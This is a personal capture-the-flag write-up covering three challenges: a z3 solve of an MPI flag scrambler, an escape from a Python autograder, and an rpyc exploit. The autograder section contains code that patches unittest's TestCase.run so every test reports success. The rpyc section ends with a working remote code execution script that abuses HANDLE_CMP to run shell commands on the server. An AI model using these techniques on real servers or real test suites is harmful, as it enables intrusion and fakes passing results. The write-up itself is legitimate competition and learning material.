### parallelism

woo first flag in another month and a half again

everyones just burnt out from organizing sapling lmao so im just looking at easy challs myself too
* * *
ngl this one is just reading MPI docs lmao

i didnt have mpirun set up, so i just ended up statically reversing the entire thing, which wasnt that bad actually

theres only really 3 functions in question:
- the first reads the flag as the root process, scrambles it, and then scatters it to the rest of the processes via `MPI_Scatter`
- on first glance i thought the second one was just an artificial delay of some sort, since all it does is basically just send and recv then sync up, but on closer look they are swapping values between processes
- the third one gathers back the flag and checks it against the string as the root process, and does nothing as the other processes (rough sketch of the whole pipeline below)
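
put together, the whole thing presumably looks something like this in mpi4py terms - a sketch from my reading of the binary, so the helper names (`scramble`, `target`) and the exact I/O are made up; only the 8-process / 10000-round swap schedule comes from the reversing below:

```py
from mpi4py import MPI

comm = MPI.COMM_WORLD
rank, size = comm.Get_rank(), comm.Get_size()  # the chall runs with 8 processes

# (1) root reads the flag into a 64-byte buffer, scrambles it, and scatters 8-byte chunks
chunks = None
if rank == 0:
    buf = scramble(bytearray(open('flag.txt', 'rb').read()))  # scramble() is hypothetical
    chunks = [buf[i:i + 8] for i in range(0, 64, 8)]
chunk = comm.scatter(chunks, root=0)

# (2) the "delay" that is actually a swap: each round, every process trades one byte
# of its chunk with a rotating partner, then everyone syncs up
for i in range(10000):
    k = i % 8
    chunk[k] = comm.sendrecv(chunk[k], dest=(rank - i) % size, source=(rank + i) % size)

# (3) root gathers everything back and compares against the hardcoded string
gathered = comm.gather(chunk, root=0)
if rank == 0:
    print(b''.join(gathered) == target)  # target = the 64-byte string baked into the binary
```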
so its just a matter of rewriting the program in python without all the interprocess communication overheads then

except i kept brainfarting and somehow thought `#!py print("".join(['m_ERpmfrNkekU4_4asI_Tra1e_4l_c4_GCDlryidS3{Ptsu9i}13Es4V73M4_ans'[s[i]] for i in range(64)]))` would give me the correctly inverted flag if `s` is the scrambled index lmao
then i went on a rabbit hole figuring out where exactly i did the swapping wrong, scrutinizing every single detail in the MPI docs and trying out like 4 different variations of my swapping, from doing it in parallel to making a multidimensional array to ensure im not making arithmetic mistakes on the array indices

and then i finally gave up and used z3, which instantly spewed out the flag :clown: `dice{P4ral1isM_m4kEs_eV3ryt4InG_sUp3r_f4ST_aND_s3CuRE_a17m4k9l4}`
moral of the story: i am not to be trusted when it comes to math *at all*
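
(in hindsight the inversion i kept fumbling is just index bookkeeping - a minimal sketch, assuming a `scramble()` helper that replays the exact same swap sequence as the binary:)

```py
# replay the binary's swaps on a list of indices instead of on the flag itself;
# afterwards idx[i] is the original position that ends up in slot i, so the flag
# comes back by writing the target string through idx the other way round
idx = list(range(64))
scramble(idx)  # hypothetical helper doing the same swaps the binary does

target = b'm_ERpmfrNkekU4_4asI_Tra1e_4l_c4_GCDlryidS3{Ptsu9i}13Es4V73M4_ans'
flag = bytearray(64)
for i in range(64):
    flag[idx[i]] = target[i]  # not flag[i] = target[idx[i]], which was my mistake
print(flag.decode())
```

anyway, the z3 version that actually got me the flag: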
```py
from functools import reduce
from z3 import *

sol = Solver()

# s = list(range(64))
# inverse operations are not my forte :') thanks z3
s = [BitVec(f'char{i}', 8) for i in range(64)]
orig = [v for v in s]

v3 = [None]*32
v3[0] = 26
v3[1] = 32
v3[2] = 14
v3[3] = 11
v3[4] = 3
v3[5] = 1
v3[6] = 32
v3[7] = 24
v3[8] = 13
v3[9] = 17
v3[10] = 3
v3[11] = 17
v3[12] = 2
v3[13] = 13
v3[14] = 19
v3[15] = 6
v3[16] = 12
v3[17] = 22
v3[18] = 3
v3[19] = 30
v3[20] = 10
v3[21] = 6
v3[22] = 8
v3[23] = 26
v3[24] = 6
v3[25] = 22
v3[26] = 13
v3[27] = 1
v3[28] = 19
v3[29] = 1
v3[30] = 1
v3[31] = 29

# initial scramble in the first function
for i in range(32):
    s[i], s[v3[i] + 31] = s[v3[i] + 31], s[i]

# "scatter" it into a two dimension array
s = [s[i:i + 8] for i in range(0, len(s), 8)]

for i in range(10000):
    # swap all 8 in parallel
    recv = [s[((((j + i) % 8) + 8) % 8)][(i % 8)] for j in range(8)]
    for j in range(8):
        s[j][(i % 8)] = recv[j]

# gather (flatten it back down)
s = reduce(list.__add__, s)

# now we can constraint and solve for the scrambled characters
for i, v in enumerate(s):
    sol.add(v == b'm_ERpmfrNkekU4_4asI_Tra1e_4l_c4_GCDlryidS3{Ptsu9i}13Es4V73M4_ans'[i])

print(s)
sol.check()
model = sol.model()
for i in orig:
    if str(model[i]) != 'None':
        print(chr(int(str(model[i]))), end='')
print()
```
### scorescope

eyo something familiar to me lets go ??

~~totally not something ive been doing to my own courses' autograders~~ except this one highkey is easier than the hurdles prairielearn and the likes bring me through tho lmao
we get arbitrary leaks just by returning the value (albeit truncated), and theres no restrictions on whatever imports we need

so logically the first thing to do is to traverse the stack, since apparently all of these autograders basically run in the same process for some reason lol
~~like interprocess communication and isolation between graders and runners wouldve been a much better design choice to prevent grade modifications but ok~~
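
the traversal itself is nothing fancy - a rough sketch of the idea (hedged; the actual payloads lived inside the homework functions, like in the full submission at the end):

```py
import inspect

def probe():
    # walk up the call stack and note a few globals every caller frame can see;
    # returning the string from a "solution" function leaks it through the test output
    seen = []
    frame = inspect.currentframe().f_back
    while frame is not None:
        seen.append(list(frame.f_globals.keys())[:5])  # small peek per frame
        frame = frame.f_back
    return str(seen)
```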
anyways it seems like most of the useful variables are in the second previous frame, so after a lot of `str(inspect.currentframe().f_back.f_back.f_globals.keys())[:64]`, `[64:128]`, `[128:192]` etc etc to leak the data out by chunks to bypass the truncation i mentioned before
i finally... got fed up with the inefficiency :upside_down: which funnily enough is also when i saw `_common_shorten_repr`, which sounds suspiciously like its responsible for the truncation

and so nooping it i go: `#!py inspect.currentframe().f_back.f_back.f_globals['_common_shorten_repr'] = lambda *str: str`
originally i guessed `#!py lambda str: str`, but that ended up spewing arcane errors about the format string having not enough parameters lmao, so i just made it vararg instead and ey i was correct
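
which makes sense in hindsight - iirc unittest splats whatever that helper returns straight into a format string when building assertion messages, roughly like this (paraphrased from memory, exact call sites may differ between python versions):

```py
from unittest.util import _common_shorten_repr

# the helper returns one (possibly shortened) repr per argument, and unittest splats
# that tuple into a message template, so the arity has to match
first, second = 'expected', 'actual'
print('%s != %s' % _common_shorten_repr(first, second))
# hence lambda *str: str works as a drop-in, while lambda str: str trips the
# "not enough arguments for format string" error
```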
now we can leak things much faster than having to stitch together chunks after multiple runs
the next thing that caught my eye is `TestCase` - this is just from the builtin `unittest` module aint it

for it to be here it probably means they are using it to run the tests, so what if we just make all the assertions on it succeed

and with the following code
```py
# TestCase is just python unittests, we can set assert* to True to pass all assertions
inspect.currentframe().f_back.f_back.f_globals['TestCase'].assertEqual = lambda *_: True
keys = [i for i in dir(inspect.currentframe().f_back.f_back.f_globals['TestCase']) if 'assert' in i]
for key in keys:
    setattr(inspect.currentframe().f_back.f_back.f_globals['TestCase'], key, lambda *_: True)
```
it actually somewhat worked, except a lot of the other test cases are still complaining about wrong format lmao

so just nooping the assertions isnt enough, we need to noop the entire test case
after reading on how `TestCase` works for a bit i realized all test cases have to go through the `run` entrypoint, so what if we just noop that instead
turns out its slightly more complicated than just a `lambda res: None` lmao - we need to get the actual test cases which subclass `util.TestCase`, and also set the `TestResult` object to success

so with
```py
def run(self, result):
    result.addSuccess(self)
    return result

classes = inspect.currentframe().f_back.f_back.f_globals['TestCase'].__subclasses__()[-1].__subclasses__()
for cls in classes:
    cls.run = run  # replace run with one that always return success to the testresult
```
it finally works eyy

except for the `test_add_mixed` case for some reason, so i just manually did the actual thing they expected and got the flag lmfao `dice{still_more_secure_than_gradescope}`

is it tho
```py
# DICE 1001
# Homework 3
#
# @author [full name]
# @student_id [student id]
#
# Collaborators:
# - [list collaborators here]
#
# Resources:
# - [list resources consulted]

def add(a, b):
    '''
    Return the sum of a and b.

    Parameters:
        a (int): The first number to add.
        b (int): The second number to add.

    Returns:
        int: The sum of a and b.
    '''
    ######## YOUR CODE ########

    # owo shorten repr probably can be replaced to remove that annoying truncation
    import inspect
    inspect.currentframe().f_back.f_back.f_globals['_common_shorten_repr'] = lambda *str: str

    def run(self, result):
        result.addSuccess(self)
        return result

    classes = inspect.currentframe().f_back.f_back.f_globals['TestCase'].__subclasses__()[-1].__subclasses__()
    for cls in classes:
        cls.run = run  # replace run with one that always return success to the testresult

    return a + b  # to fix the mixed case which aint affected by changing testcases at all for some reason

    ###########################

def longest(words):
    '''
    Return the longest word in a list of words.
    When there are multiple words of the same length, return the first.

    Parameters:
        words (list): A list of words.

    Returns:
        str: The longest word in the list.
    '''
    ######## YOUR CODE ########

    # code leftover from leaking chunk by chunk in parallel
    # each truncation happens close to after 64 chars, so we trunc by 64 and print it in parallel to try speeding things up
    import inspect
    return str(inspect.currentframe().f_back.f_back.f_globals.keys())[128+128+64:128+128+128]

    ###########################

# omitted the rest of the functions (which are just noops) for brevity
```
### pike

lol this actually took me quite a bit of time for the amount of solves it has

like how does this have more solves than scorescope

i guess im just bad at reading docs and src efficiently lmao
had to dig for the vuln for quite a bit before realizing `HANDLE_CMP` is insecure, being the only location where getattr is not protected
i was originally just doing it the normal way, hoping that unlike normal pickles rpyc can transport code across to remote, so something like this would work
```py
import subprocess

# conn = rpyc.connect(...) as in the final exploit at the bottom
class test():
    def __add__(self, b):
        breakpoint()
        return subprocess.Popen('dir', shell=True, stdout=subprocess.PIPE).communicate()

print(conn.root.exposed_add(test(), test()))
```
even tried to nudge rpyc into sending the code to remote, to no avail lol
```py
class metatest(type):
    def __add__(self, b):
        import subprocess
        breakpoint()  # if its local i will see instantly on my current terminal - just for ease of local debugging since cwd is same for server and client and its hard to tell
        return subprocess.Popen('dir', shell=True, stdout=subprocess.PIPE).communicate()

class test(metaclass=metatest):
    def __init__(self) -> None:
        import sys
        self.sys = sys

print(conn.root.exposed_add(test, test))
```
coz i thought what if they only accounted for normal usage of functions, so cases like these would be tricked into calling the local versions of the objects instead of netrefs

but no, thats not how it works
so since it seems like normal use cases wont be able to trigger code execution on remote, its time to dig deep into the src
it turns out theres a netref class in `netref.py` that basically proxies all remote objects' functions back to remote through a few handlers in `protocol.py`

which means all local references execute on local, since on remote they just become a netref and bounce back to run the code on local (and vice versa too - all remote references will stay in remote land, but we cant really access remote references since getattr is locked down)
since it seems like there aint much we can do with the netrefs themselves, i started digging deep into the protocol handlers, which all seemed pretty secure in the `DEFAULT_CONFIG` sense - until i found `HANDLE_CMP`, which just called `#!py return getattr(type(obj), op)(obj, other)` for some reason
for
some
reason
so
i
started
thinking
if
theres
any
attr
we
can
leak
that
will
help
us
leak
more
which
*
also
*
has
the
property
of
accepting
2
parameters
-
and
it
turns
out
`
__getattr__
`
does
exactly
that
except `__getattr__` actually just bounces everything back into local:
```py
def __getattr__(self, name):
    if name in DELETED_ATTRS:
        raise AttributeError()
    return syncreq(self, consts.HANDLE_GETATTR, name)
```
BUT `__getattribute__` DOES get the local attributes specified in the `LOCAL_ATTRS` dict, which includes most useful things like `__class__` and `__dict__`
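
so feeding `__getattribute__` in as the "comparison" op turns that line into a plain unrestricted getattr - a tiny local demo of the dunder-through-the-type trick (nothing rpyc specific here):

```py
# getattr(type(obj), op)(obj, other) with op='__getattribute__' is just getattr(obj, other)
class Obj:
    secret = 'hunter2'

obj, op, other = Obj(), '__getattribute__', 'secret'
print(getattr(type(obj), op)(obj, other))  # -> 'hunter2', an unfiltered attribute fetch
```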
now we can finally leak remote references that are not netrefs out into our client, which once we have them should allow us to stay in remote land
we still need to keep using this vulnerable `getattr` method instead of directly `obj.attr`ing (which would use the secure `HANDLE_GETATTR` handler) though, but the idea stays the same as most basic pyjails
that
,
we
can
get
arbitrary
code
execution
on
remote
,
and
the
flag
:
`
dice
{
pyj41l_w1th_4_tw15t
}
`
```py
import rpyc
from rpyc.core import consts

# the idea is that once you get a remote reference, you can stay in remote land since all calls will be directed back to remote
# however getting that remote reference in the first place is quite annoying since most useful attributes are either blocked or local
# and theres not really a way to differentiate between those unless you dive into rpyc src
# also any local references (e.g. import os; os.system is a local reference that will end up running on our local machine; a local definition of a class with modified __add__ to trick remote to run will also not work since it will bounce back to local when we do conn.root.add())
# will end up bouncing back to local
# so the entrypoint has to be conn.root since that's the only remote reference at start

def remote_getattr(obj, name):
    # abuses the fact that CMP is the only one that doesnt have a secure check but directly uses getattr
    # also abuses the fact that __getattribute__ bypasses netref calls for certain local attrs so we dont bounce back to client
    return conn.sync_request(consts.HANDLE_CMP, obj, name, '__getattribute__')

def remote_setattr(obj, name, value):
    conn.sync_request(consts.HANDLE_CMP, obj, '__setattr__', '__getattribute__')('exposed_' + name, value)  # exposed_ bypasses restrictions

conn = rpyc.connect('127.0.0.1', port=1337)

# we can directly do remote_func() since __call__ directly calls netref request, and is not restricted unlike getattr or setattr
# manual index coz iterating through the string of the classes ends up being way too slow
remote_wrap_close = remote_getattr(remote_getattr(remote_getattr(remote_getattr(conn.root, '__class__'), '__base__'), '__base__'), '__subclasses__')()[140]
print(remote_wrap_close)

# we couldve used wrap_close's os.system instead, but we cant exfil the data from that so we go the long way and use subprocess instead
import subprocess  # we can use local import coz PIPE itself is just a single int value
remote_popen = remote_getattr(remote_getattr(remote_getattr(remote_wrap_close, '__init__'), '__globals__')['__builtins__']['__import__']('subprocess'), 'Popen')
print(remote_getattr(remote_popen('cat flag.txt', shell=True, stdout=subprocess.PIPE), 'communicate')())
```
also unrelated: wsl port forwarding messed with my local/remote debug setup apparently lmao

and it seems like rpyc requires the same (major?) version on both ends to run correctly? i was on 5.1.0, which just kept giving me connection closed by peer

this bug apparently is patched in the version i had in my python installation, so im just glad i got stuck connecting to remote and downgraded to 4.1.0 before digging into the src lmao, or else i'd probably be malding over how theres no entrypoints for me to exploit at all kekw